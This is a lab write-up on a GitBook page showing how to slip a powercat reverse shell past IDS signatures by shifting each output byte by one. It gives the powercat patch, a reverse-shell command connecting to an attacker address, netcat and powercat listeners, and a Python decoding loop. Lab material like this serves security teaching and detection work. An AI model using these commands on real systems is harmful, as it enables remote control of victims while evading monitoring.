Powered By GitBook
Bypassing IDS Signatures with Simple Reverse Shells
Most Intrusion Detection Systems (IDS) have signatures that can catch simple reverse shells going across the network.
The thing that will get you flagged usually is the classic cmd prompt banner:
1
listening on [any] 443 ...
2
connect to [192.168.2.79] from ws01 [192.168.2.149] 56079
3
Microsoft Windows [Version 10.0.17763.475]
4
(c) 2018 Microsoft Corporation. All rights reserved.
Copied!
This can usually be bypassed relatively easily with some simple traffic obfuscation and this quick lab demonstrates just that.
Warning This technique is not meant to be used in real life red team operations!

Environment and Setup

    Victim's Windows system capable of running powershell scripts
    Victim's system runs Powercat - netcat's Powershell implementation
    Attacker's Windows machine with a powercat listener
    Attacker's Linux machine with a netcat listener

Execution - Encoding Responses

Since we want to obfuscate the outgoing traffic from the victim system to the attacking system, we need to obfuscate the responses generated by the reverse shell.
Let's modify powercat to achieve this. Int this lab, I will use a simple obfuscation technique - every ascii character will be shifted to the right by 1, so a will become b, b->c, c->d and so on, but base64 or any other encoding mechanisms could work.
In powercat.ps1, let's find the function ReadData_CMD and add a new line (576 from the below graphic):
1
$Data = $Data | % {[byte]$_+1}
Copied!
With the modified powercat, let's try establishing a reverse shell and catch it on the other end and see what happens:
1
# victim
2
powercat -c 192.168.2.79 443 -e cmd
3
4
#attacker
5
powercat -l -p 443 -v
Copied!
Below shows the incoming reverse shell, but it's of course not readable since we shifted all the characters by one. Although this is enough to bypass IDS signatures relying on the cmd prompt banner crossing the network, the shell on itself is not very useful since we cannot read the results:

Decoding Responses

We need to decode the responses by using the code we used earlier and make sure that we are now subtracting 1 rather than adding, so that d becomes c, c->b, b->a and so on:
1
$Data = $Data | % {[byte]$_-1}
Copied!
In powercat.ps1, find the function WriteData_Console and add the code just below the parameter declaration:
If we try establishing the reverse shell now, we can see it gets decoded nicely on the attacking system running powercat listener on Windows:
If we inspect the traffic, we confirm that the traffic is encoded:

Decoding Responses in Linux

If we are listening for a shell in netcat on a Linux box with no powershell (my kali was giving me a hard time trying to install powershell), we need to hack together a filthy python loop that will do the decoding for us first:
1
#!/usr/bin/python3
2
import os, time
3
4
global decoded
5
while 1:
6
decoded = ""
7
encodedFile = open("myfile", "rb+")
8
i = 0
9
last = ""
10
encodedBytes = encodedFile.read()
11
12
for byte in encodedBytes:
13
if byte > 0 and byte <= 127:
14
byte -= 1
15
else:
16
byte = 10
17
18
if byte != last:
19
decoded += chr(byte)
20
last = byte
21
i += 1
22
23
if len(decoded) > 1:
24
print(decoded)
25
os.system("echo > myfile")
26
time.sleep(1)
Copied!
Let's launch the netcat listener on a linux box and pipe the output to tee so it can be put to a file myfile
1
nc -lvvp 443 | tee myfile
Copied!
In another terminal, we need to launch the decoder.py which will read the myfile every second and will decode its content and wipe it:
1
./decoder.py
Copied!
We can now send the reverse shell back from the windows machine and see how it works:
    Right - a compromised Windows system that will send a reverse shell to the attacker using powercat
    Top left - the reverse shell comes in, responses are encoded. This is where we can issue commands
    Bottom left - reverse shell responses are decoded
Last modified 2yr ago